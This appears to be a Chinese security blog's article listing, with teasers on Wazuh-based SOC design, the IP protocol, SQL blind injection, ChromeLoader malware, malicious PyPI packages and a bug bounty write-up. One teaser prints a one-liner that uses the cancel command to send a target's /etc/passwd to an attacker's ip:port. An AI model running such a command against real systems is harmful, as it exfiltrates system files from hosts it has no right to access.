通过上周的文章,大致知道了开源SOC整体架构,今天从后端存储方面再来细化下整体架构图。 存储的基础要求就是满足存储一段时间的日志并且提供快速索引,看到这两个需求很快就可以想起ES,确实ES可...
01月23日16 views评论index
server
开源SOC实现(一)-Wazuh indexer&Wazuh dashboard
01月23日16 views评论index
server
01月23日16 views评论index
server
网络层协议 ——— IP协议
在下方公众号后台回复:【网络安全】,可获取给你准备的最新网安教程全家桶。 IP 协议IP 协议全称为 “网际互连协议(Internet Protocol)”,IP 协议是 TCP/IP 体系...
01月03日3 views评论传输层
路由器
【表哥有话说 第78期】SQL盲注
ChromeLoader:新出现劫持用户浏览器搜索和展示广告的恶意软件活动(下)
信息窃取程序和广告软件为了与恶意扩展程序进行通信,开发者使用了命令和控制服务器(C2),这与之前用于安装扩展程序的安装服务器不同。该恶意软件使用各种扩展功能,使其在用户浏览器中占有一席之地。恶意软件安...
07月20日9 views评论c
恶意软件
奇淫技巧:linux下无回显可将回显发送到服务器
靶机无回显的情况下可使用 cancel 来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻击机...
07月05日13 views评论etc
port
Py包被发现将被盗的AWS密钥发送到不安全的站点
PyPI是一个开源包的存储库,软件开发人员使用它来挑选基于Python的项目的构建块或与社区分享他们的工作。PyPI存储库中可用的多个恶意Python程序包被发现窃取AWS凭证等敏感信息,并将其传输到...
06月27日26 views评论python
开发人员
我如何找到对电子商务网站 300 万用户个人数据的读/写访问权限?
我是网络安全研究员Prashant Singh。这是我的第一个漏洞赏金文章。只是我对社区的一小部分贡献我不能透露漏洞赏金计划的名称,因此在这种情况下,它会被称为 redacted.com。该网站使用基...
01月06日57 views评论com
用户
喜欢读书的朋友们小心了,黑客已经可以接管你的 Kindle了
自2007年以来,亚马逊已售出数千万台Kindle,但这也意味着数以千万计的人可能会因为这些 Kindle 中的软件漏洞而被黑客攻击。他们的设备可能会变成木马,或者他们的私人本地网络会受到攻击,甚至他...
12月22日84 views评论应用程序
黑客